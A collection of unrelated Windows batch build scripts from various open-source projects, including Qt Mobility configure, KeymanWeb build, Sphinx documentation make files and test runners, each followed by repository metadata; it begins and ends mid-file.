call :compileTest SNAP snap
call :compileTest OCC occ
)
if "%SENSORS_SELECTED%" == "yes" (
call :compileTest S60_Sensor_API sensors_s60_31
call :compileTest Symbian_Sensor_Framework sensors_symbian
)
if "%MESSAGING_SELECTED%" == "yes" (
call :compileTest Symbian_Messaging_Freestyle messaging_freestyle
)
if "%SYSTEMINFO_SELECTED%" == "yes" (
call :compileTest Symbian_Hb hb_symbian
)
if "%LOCATION_SELECTED%" == "yes" (
call :compileTest LBT lbt
)
goto noTests
:windowsTests
if "%MULTIMEDIA_SELECTED%" == "yes" (
call :compileTest DirectShow directshow
call :compileTest WindowsMediaSDK wmsdk
call :compileTest WindowMediaPlayer wmp
call :compileTest EnhancedVideoRenderer evr
)
:noTests
echo End of compile tests
echo.
echo.
REM we could skip generating headers if a module is not enabled
if not exist "%BUILD_PATH%\features" mkdir %BUILD_PATH%\features
copy %SOURCE_PATH%\features\strict_flags.prf %BUILD_PATH%\features
echo Generating Mobility Headers...
rd /s /q %BUILD_PATH%\include
mkdir %BUILD_PATH%\include
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include %SOURCE_PATH%\src\global
set MODULES_TEMP=%MOBILITY_MODULES%
:generateHeaders
for /f "tokens=1,*" %%a in ("%MODULES_TEMP%") do (
set FIRST=%%a
set REMAINING=%%b
)
if %FIRST% == bearer (
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtBearer %SOURCE_PATH%\src\bearer
) else if %FIRST% == contacts (
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtContacts %SOURCE_PATH%\src\contacts
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtContacts %SOURCE_PATH%\src\contacts\requests
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtContacts %SOURCE_PATH%\src\contacts\filters
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtContacts %SOURCE_PATH%\src\contacts\details
) else if %FIRST% == location (
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtLocation %SOURCE_PATH%\src\location
) else if %FIRST% == messaging (
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtMessaging %SOURCE_PATH%\src\messaging
) else if %FIRST% == multimedia (
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtMultimediaKit %SOURCE_PATH%\src\multimedia
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtMultimediaKit %SOURCE_PATH%\src\multimedia\audio
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtMultimediaKit %SOURCE_PATH%\src\multimedia\video
) else if %FIRST% == publishsubscribe (
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtPublishSubscribe %SOURCE_PATH%\src\publishsubscribe
) else if %FIRST% == systeminfo (
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtSystemInfo %SOURCE_PATH%\src\systeminfo
) else if %FIRST% == serviceframework (
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtServiceFramework %SOURCE_PATH%\src\serviceframework
) else if %FIRST% == versit (
REM versit implies contacts
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtVersit %SOURCE_PATH%\src\versit
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtContacts %SOURCE_PATH%\src\contacts
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtContacts %SOURCE_PATH%\src\contacts\requests
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtContacts %SOURCE_PATH%\src\contacts\filters
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtContacts %SOURCE_PATH%\src\contacts\details
) else if %FIRST% == sensors (
perl -S %SOURCE_PATH%\bin\syncheaders %BUILD_PATH%\include\QtSensors %SOURCE_PATH%\src\sensors
)
if "%REMAINING%" == "" (
shift
) else (
set MODULES_TEMP=%REMAINING%
goto generateHeaders
)
SET REMAINING=
SET FIRST=
SET MODULES_TEMP=
if exist config.pri del config.pri
ren %PROJECT_CONFIG% config.pri
echo.
echo Running qmake...
call %QT_PATH%qmake -recursive %VC_TEMPLATE_OPTION% %SOURCE_PATH%\qtmobility.pro
if errorlevel 1 goto qmakeRecError
echo.
echo configure has finished. You may run %MOBILITY_MAKE% to build the project now.
goto exitTag
:qmakeRecError
echo.
echo configure failed.
goto errorTag
:errorTag
set BUILD_PATH=
set CURRENTDIR=
set MOBILITY_MAKE=
set MOBILITY_BUILDSYSTEM=
set PROJECT_CONFIG=
set PROJECT_LOG=
set QT_MOBILITY_PREFIX=
set QT_PATH=
set SOURCE_PATH=
set MOBILITY_MODULES=
set MOBILITY_MODULES_UNPARSED=
SET REMAINING=
SET FIRST=
SET MODULES_TEMP=
set CONTACTS_SELECTED=
set BEARER_SELECTED=
set SYSTEMINFO_SELECTED=
set SENSORS_SELECTED=
set MESSAGING_SELECTED=
set MULTIMEDIA_SELECTED=
set LOCATION_SELECTED=
exit /b 1
:exitTag
set BUILD_PATH=
set CURRENTDIR=
set MOBILITY_MAKE=
set MOBILITY_BUILDSYSTEM=
set PROJECT_CONFIG=
set PROJECT_LOG=
set QT_MOBILITY_PREFIX=
set QT_PATH=
set SOURCE_PATH=
set MOBILITY_MODULES=
set MOBILITY_MODULES_UNPARSED=
SET REMAINING=
SET FIRST=
SET MODULES_TEMP=
set CONTACTS_SELECTED=
set BEARER_SELECTED=
set SYSTEMINFO_SELECTED=
set SENSORS_SELECTED=
set MESSAGING_SELECTED=
set MULTIMEDIA_SELECTED=
set LOCATION_SELECTED=
exit /b 0
|
community-ssu/qt-mobility
|
configure.bat
|
bat
|
lgpl-2.1
| 22,429 |
@IF EXIST "%~dp0\node.exe" (
"%~dp0\node.exe" "%~dp0\twolfson-style" %*
) ELSE (
@SETLOCAL
@SET PATHEXT=%PATHEXT:;.JS;=;%
node "%~dp0\twolfson-style" %*
)
|
twolfson/twolfson-style
|
bin/twolfson-style.cmd
|
bat
|
unlicense
| 172 |
@echo off
rem
rem Compile keymanweb and copy compiled javascript and resources to output folder
rem
rem Get last build number
set BUILD=300
set /p BUILD=<version.txt
if "%1" == "-ui" goto ui
if "%1" == "-test" goto web
if not "%1" == "" goto help
:web
rem Increment build number
set /a BUILD=%BUILD%+1
echo.
echo Compiling build %BUILD%
echo.
rem Compile supplementary plane string handing extensions
echo Compile SMP string extensions
del ..\output\kmw-smpstring.js 2>nul
java -jar ..\tools\compiler.jar --js kmwstring.js --compilation_level SIMPLE_OPTIMIZATIONS --js_output_file ..\output\kmw-smpstring.js --warning_level VERBOSE
if not exist ..\output\kmw-smpstring.js goto fail
rem Compile KeymanWeb code modules for native keymanweb use, stubbing out and removing references to debug functions
echo Compile Keymanweb
del ..\output\kmwtemp.js 2>nul
java -jar ..\tools\compiler.jar --define __BUILD__=%BUILD% --externs kmwreleasestub.js --js kmwbase.js --js keymanweb.js --js kmwosk.js --js kmwnative.js --js kmwcallback.js --js kmwkeymaps.js --js kmwlayout.js --js kmwinit.js --compilation_level SIMPLE_OPTIMIZATIONS --js_output_file ..\output\kmwtemp.js --warning_level VERBOSE
if not exist ..\output\kmwtemp.js goto fail
echo Append SMP string extensions to Keymanweb
copy /B ..\output\kmw-smpstring.js+..\output\kmwtemp.js ..\output\keymanweb.js
del ..\output\kmwtemp.js
if "%1" == "-test" goto done
rem Update any changed resources
echo Copy or update resources
xcopy resources\*.* ..\output\resources /D /E /Y >nul
rem Update build number if successful
echo.
echo KeymanWeb 2 build %BUILD% compiled and saved.
echo.
echo %BUILD% >version.txt
goto done
rem Compile UI code modules (TODO: add date testing, only recompile if needed)
:ui
echo Compile ToolBar UI
del ..\output\kmuitoolbar.js 2>nul
java -jar ..\tools\compiler.jar --js kmwuitoolbar.js --externs kmwreleasestub.js --compilation_level ADVANCED_OPTIMIZATIONS --js_output_file ..\output\kmwuitoolbar.js --warning_level VERBOSE --output_wrapper "(function() {%%output%%}());"
if not exist ..\output\kmwuitoolbar.js goto fail
echo Compile Toggle UI
del ..\output\kmuitoggle.js 2>nul
java -jar ..\tools\compiler.jar --js kmwuitoggle.js --externs kmwreleasestub.js --compilation_level SIMPLE_OPTIMIZATIONS --js_output_file ..\output\kmwuitoggle.js --warning_level VERBOSE --output_wrapper "(function() {%%output%%}());"
if not exist ..\output\kmwuitoggle.js goto fail
echo Compile Float UI
del ..\output\kmuifloat.js 2>nul
java -jar ..\tools\compiler.jar --js kmwuifloat.js --externs kmwreleasestub.js --compilation_level ADVANCED_OPTIMIZATIONS --js_output_file ..\output\kmwuifloat.js --warning_level VERBOSE --output_wrapper "(function() {%%output%%}());"
if not exist ..\output\kmwuifloat.js goto fail
echo Compile Button UI
del ..\output\kmuibutton.js 2>nul
java -jar ..\tools\compiler.jar --js kmwuibutton.js --externs kmwreleasestub.js --compilation_level SIMPLE_OPTIMIZATIONS --js_output_file ..\output\kmwuibutton.js --warning_level VERBOSE --output_wrapper "(function() {%%output%%}());"
if not exist ..\output\kmwuibutton.js goto fail
echo User interface modules compiled and saved.
goto done
:fail
echo.
echo Build failed
goto done
:help
echo.
echo Usage: build to compile keymanweb application code to output folder
echo build -ui to compile desktop user interface modules to output folder
echo build -test to compile for testing without copying resources or
echo updating the saved version number.
:done
echo.
|
jmdurdin/keymanweb
|
source/build.bat
|
bat
|
apache-2.0
| 3,560 |
@ECHO OFF
REM Command file for Sphinx documentation
set SPHINXBUILD=sphinx-build
set BUILDDIR=_build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^<target^>` where ^<target^> is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. changes to make an overview over all changed/added/deprecated items
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\django-mockups.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\django-mockups.ghc
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
:end
|
sorl/django-mockups
|
docs/make.bat
|
bat
|
bsd-3-clause
| 3,087 |
{
"Description": "sleep 10s",
"Cmd": "sleep",
"Args": ["10"],
"Input": "",
"Output": "",
"Parameters": "",
"Group": "debug"
}
|
jroimartin/intelengine
|
cmd/intelworker/cmds/debug_sleep.cmd
|
bat
|
bsd-3-clause
| 133 |
@echo off
pushd %~dp0
"%VS120COMNTOOLS%..\IDE\mstest" /test:Microsoft.Protocols.TestSuites.MS_ASCMD.S19_Sync.MSASCMD_S19_TC14_Sync_MoreThanOneFilterTypes /testcontainer:..\..\MS-ASCMD\TestSuite\bin\Debug\MS-ASCMD_TestSuite.dll /runconfig:..\..\MS-ASCMD\MS-ASCMD.testsettings /unique
pause
|
XinwLi/Interop-TestSuites-1
|
ExchangeActiveSync/Source/Scripts/MS-ASCMD/RunMSASCMD_S19_TC14_Sync_MoreThanOneFilterTypes.cmd
|
bat
|
mit
| 288 |
copy LICENSE.md bin
copy README.md bin
".nuget\NuGet.exe" pack bulky.nuspec -BasePath bin
|
teves-castro/bulky
|
pack-nuget.bat
|
bat
|
mit
| 89 |
del BurpExtender.class
del BurpExtender.jar
javac.exe BurpExtender.java
jar.exe -cf BurpExtender.jar BurpExtender.class
java -Xmx512m -classpath "*" burp.StartBurp "admin" "password"
|
Snifer/BurpSuite-Plugins
|
BurpExtender-reCAPTCHA/compile.bat
|
bat
|
gpl-2.0
| 186 |
@echo off
set BEAM4_HOME=${installer:sys.installationDir}
echo.
@echo Welcome to the BEAM command-line interface!
@echo The following command-line tools are available:
@echo gpt.bat - General Graph Processing Tool
@echo pconvert.bat - General product conversion and quicklook generation
@echo visat-d.bat - VISAT application launcher for debugging
@echo Typing the name of the tool will output its usage information.
echo.
cd "%BEAM4_HOME%\bin"
prompt $G$S
|
bcdev/beam
|
src/main/bin/win/beam-cli.bat
|
bat
|
gpl-3.0
| 491 |
@set PATH=%1;%PATH%
@bash %2 %3
|
nagyistoce/imaginable
|
autoversion-svn.bat
|
bat
|
gpl-3.0
| 34 |
%1Ilmerge.exe /log %2CIMEL.Chart.exe /log %2CIMEL.Core.dll /log %2Peach.Log.dll /log %2CIMEL.Dog.dll /log %2Newtonsoft.json.dll /log %2log4net.dll /log %2dog_net_windows.dll /log %2CIMEL.RSA.dll /log %2MWArray.dll /log %2CIMELDraw.dll /log %2CIMEL.Figure.dll /t:winexe /out:%2´óÆøÆøÈܽº¹âѧ²ÎÊý´¦ÀíÈí¼þ.exe /targetplatform:v4 /ndebug
|
CIMEL/CIMEL
|
CIMEL.Chart/ILMerge.bat
|
bat
|
apache-2.0
| 333 |
setMode -bs
setCable -port svf -file toplevel.svf
addDevice -p 1 -file ISE/toplevel.bit
program -p 1
closeCable
quit
|
dergraaf/loa
|
fpga/toplevel/damballa_test/impact.cmd
|
bat
|
bsd-3-clause
| 117 |
nircmd monitor off
|
sergejey/majordomo
|
rc/commands/displayoff.bat
|
bat
|
mit
| 18 |
set __common__=..\common\core.c ..\common\db.c ..\common\grfio.c ..\common\lock.c ..\common\malloc.c ..\common\nullpo.c ..\common\socket.c ..\common\timer.c
set __define__=-DPACKETVER=6 -DNEW_006b -DFD_SETSIZE=4096
set __include__=-I../common/
@rem Warning ª900ÂãoīĽªÈñ¾©ª©çÈ¢ÌÅAê}§B
@rem C³·éCÍN«È¢ÌżÍ{è[hÁۢŷB
@rem W7035 : t«lÆÈµlÌär
@rem W8004 : **** Éãüµ½lÍgíêĢȢ
@rem W8012 : t«lÆÈµlÌär
@rem W8057 : p[^ **** Íêxàgp³êÈ¢
set __warning__=-w-7035 -w-8004 -w-8012 -w-8057
cd src\login
bcc32 -j255 %__warning__% %__define__% %__include__% login.c md5calc.c %__common__%
copy login.exe ..\..\login-server.exe
cd ..\char
bcc32 -j255 %__warning__% %__define__% %__include__% char.c int_pet.c int_guild.c int_party.c int_storage.c inter.c %__common__%
copy char.exe ..\..\char-server.exe
cd ..\map
bcc32 -j255 %__warning__% %__define__% %__include__% map.c npc.c battle.c chat.c chrif.c clif.c guild.c intif.c itemdb.c mob.c atcommand.c party.c path.c pc.c pet.c status.c script.c skill.c storage.c trade.c vending.c %__common__%
copy map.exe ..\..\map-server.exe
cd ..\..\
|
MishimaHaruna/jathena
|
bcc32_make.bat
|
bat
|
gpl-2.0
| 1,243 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=_build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
set I18NSPHINXOPTS=%SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18NSPHINXOPTS=-D latex_paper_size=%PAPER% %I18NSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^<target^>` where ^<target^> is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. texinfo to make Texinfo files
echo. gettext to make PO message catalogs
echo. changes to make an overview over all changed/added/deprecated items
echo. xml to make Docutils-native XML files
echo. pseudoxml to make pseudoxml-XML files for display purposes
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
echo. coverage to run coverage check of the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
REM Check if sphinx-build is available and fallback to Python version if any
%SPHINXBUILD% 2> nul
if errorlevel 9009 goto sphinx_python
goto sphinx_ok
:sphinx_python
set SPHINXBUILD=python -m sphinx.__init__
%SPHINXBUILD% 2> nul
if errorlevel 9009 (
echo.
echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
echo.installed, then set the SPHINXBUILD environment variable to point
echo.to the full path of the 'sphinx-build' executable. Alternatively you
echo.may add the Sphinx directory to PATH.
echo.
echo.If you don't have Sphinx installed, grab it from
echo.http://sphinx-doc.org/
exit /b 1
)
:sphinx_ok
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\Invenio-Pages.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\Invenio-Pages.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
if errorlevel 1 exit /b 1
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdf" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf
cd %~dp0
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdfja" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf-ja
cd %~dp0
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "texinfo" (
%SPHINXBUILD% -b texinfo %ALLSPHINXOPTS% %BUILDDIR%/texinfo
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The Texinfo files are in %BUILDDIR%/texinfo.
goto end
)
if "%1" == "gettext" (
%SPHINXBUILD% -b gettext %I18NSPHINXOPTS% %BUILDDIR%/locale
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The message catalogs are in %BUILDDIR%/locale.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
if errorlevel 1 exit /b 1
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
if errorlevel 1 exit /b 1
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
if errorlevel 1 exit /b 1
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
if "%1" == "coverage" (
%SPHINXBUILD% -b coverage %ALLSPHINXOPTS% %BUILDDIR%/coverage
if errorlevel 1 exit /b 1
echo.
echo.Testing of coverage in the sources finished, look at the ^
results in %BUILDDIR%/coverage/python.txt.
goto end
)
if "%1" == "xml" (
%SPHINXBUILD% -b xml %ALLSPHINXOPTS% %BUILDDIR%/xml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The XML files are in %BUILDDIR%/xml.
goto end
)
if "%1" == "pseudoxml" (
%SPHINXBUILD% -b pseudoxml %ALLSPHINXOPTS% %BUILDDIR%/pseudoxml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The pseudo-XML files are in %BUILDDIR%/pseudoxml.
goto end
)
:end
|
hachreak/invenio-pages
|
docs/make.bat
|
bat
|
gpl-2.0
| 6,995 |
SET baseDir=%~dp0
echo %~4 > %baseDir%web\revision
|
ckorzen/icecite
|
user-interface/trunk/post-commit.bat
|
bat
|
apache-2.0
| 51 |
python build.py clean
if errorlevel 1 goto ERROR
python build.py
if errorlevel 1 goto ERROR
python build.py test-compile
if errorlevel 1 goto ERROR
python build.py -f components\tools\OmeroJava\build.xml -Dtest.with.fail=false test
if errorlevel 1 goto ERROR
python build.py -f components\tools\OmeroJava\build.xml -Dtest.with.fail=false integration
if errorlevel 1 goto ERROR
cd examples
python ..\target\scons\scons.py run_java=1 no_cpp=1
if errorlevel 1 goto ERROR
exit /b 0
:ERROR
echo Failed %ERRORLEVEL%
exit /b %ERRORLEVEL%
|
jballanc/openmicroscopy
|
docs/hudson/OMERO-java.bat
|
bat
|
gpl-2.0
| 542 |
@echo off
REM *****************************************************************************
REM
REM Pentaho Data Integration
REM
REM Copyright (C) 2006 - ${copyright.year} by Hitachi Vantara : http://www.hitachivantara.com
REM
REM *****************************************************************************
REM
REM Licensed under the Apache License, Version 2.0 (the "License");
REM you may not use this file except in compliance with
REM the License. You may obtain a copy of the License at
REM
REM http://www.apache.org/licenses/LICENSE-2.0
REM
REM Unless required by applicable law or agreed to in writing, software
REM distributed under the License is distributed on an "AS IS" BASIS,
REM WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
REM See the License for the specific language governing permissions and
REM limitations under the License.
REM
REM *****************************************************************************
setlocal
pushd %~dp0
SET OPT=%OPT% "-Dorg.mortbay.util.URI.charset=UTF-8"
SET STARTTITLE="Carte"
SET SPOON_CONSOLE=1
REM ***********************************************************************
REM ** Optionally set up the options for JAAS (uncomment to make active) **
REM ***********************************************************************
REM set OPT=%OPT% -Djava.security.auth.login.config=%JAAS_LOGIN_MODULE_CONFIG%
REM set OPT=%OPT% -Dloginmodulename=%JAAS_LOGIN_MODULE_NAME%
call Spoon.bat -main org.pentaho.di.www.Carte %*
popd
|
dkincade/pentaho-kettle
|
assemblies/static/src/main/resources-filtered/Carte.bat
|
bat
|
apache-2.0
| 1,507 |
@echo off
bin\mongo.exe WebNote z_MongoDB_reset_data.js
pause
|
JohannesHoppe/WebNoteNoSQL
|
WebNoteNoSQL/Databases/MongoDB/z_MongoDB_reset_data.cmd
|
bat
|
mit
| 67 |
node.exe --debug app.js
pause
|
dnech/DIS2
|
start_debug.bat
|
bat
|
mit
| 29 |
@echo off
del Logs\*.log
echo Building GameCQ...
"%DEVENV%" ..\..\GameCQ\GameCQ.sln /build Release /out Logs\GameCQ.log
if errorlevel 1 goto :Error
goto :Done
:Error
echo Error occured...
:Done
echo Done...
pause
|
palestar/gamecq
|
Build/GCQLBuildRelease.bat
|
bat
|
mit
| 219 |
cmd_/home/muthumani/Sources/Android/extra/video_app/camera_still_fsl_dinesh/include/include/linux/can/.install := perl scripts/headers_install.pl /home/muthumani/Desktop/build_temp/esom_imx6/pwd/kernel_imx/include/linux/can /home/muthumani/Sources/Android/extra/video_app/camera_still_fsl_dinesh/include/include/linux/can arm bcm.h error.h netlink.h raw.h; perl scripts/headers_install.pl /home/muthumani/Desktop/build_temp/esom_imx6/pwd/kernel_imx/include/linux/can /home/muthumani/Sources/Android/extra/video_app/camera_still_fsl_dinesh/include/include/linux/can arm ; for F in ; do echo "\#include <asm-generic/$$F>" > /home/muthumani/Sources/Android/extra/video_app/camera_still_fsl_dinesh/include/include/linux/can/$$F; done; touch /home/muthumani/Sources/Android/extra/video_app/camera_still_fsl_dinesh/include/include/linux/can/.install
|
draftedstuff/android-serial-test
|
include/linux/can/..install.cmd
|
bat
|
mit
| 844 |
REM 6604 is a pid of a process
REM jps will print currently running java processes
REM S is survivor, E is eden, O is old, M is meta space, YGC young generation garbage collects, YGCT is time, FGCT full garbage collects
jps
jstat -gccapacity 8508
jstat -gcutil 8508
jstat -gccause 8508
jstat -gc 8508
|
sagasu/JavaPlayground
|
MemoryManagementModule/showJstatInfo.bat
|
bat
|
mit
| 300 |
cd D:\
cd D:\WorkSpace\Dot Net\C#\FastBook\src\FastBookCreator\highlight\
highlight -i main.cs -o main.html --style custom --include-style
|
ahmadaghazadeh/FastBook
|
src/FastBookCreator/highlight/Create.bat
|
bat
|
mit
| 140 |
@echo off
call build_constants.bat
mkdir "%UNITY_CLIENT_PLUGINS%"
copy /Y "%BUILD_DIR%\server\AsyncRPGSharedLib.dll" "%UNITY_CLIENT_PLUGINS%"
copy /Y "%LIB_DIR%\System.Data.SQLite.dll.config" "%UNITY_CLIENT_PLUGINS%"
xcopy "%LIB_DIR%\*.dll" "%UNITY_CLIENT_PLUGINS%" /s /y /q
|
brendanwalker/AsyncRPG
|
scripts/build/copy_server_dlls_to_unity.bat
|
bat
|
mit
| 276 |
powershell .\psake Publish
|
philipproplesch/Web.Optimization
|
bld/publish.cmd
|
bat
|
mit
| 26 |
@echo off
java -jar %~dp0vault_controller.jar --properties %~dp0 %*
|
mironal/GlacierTools
|
jar/vault_controller.bat
|
bat
|
mit
| 68 |
@echo off
rem
rem Steadier State command file \srs\merge.cmd
rem
rem FUNCTION:
rem Merges files snapshot.vhd and image.vhd into image.vhd Here are
rem the detailed steps.
rem 1) Gets information about the existence of image.vhd and
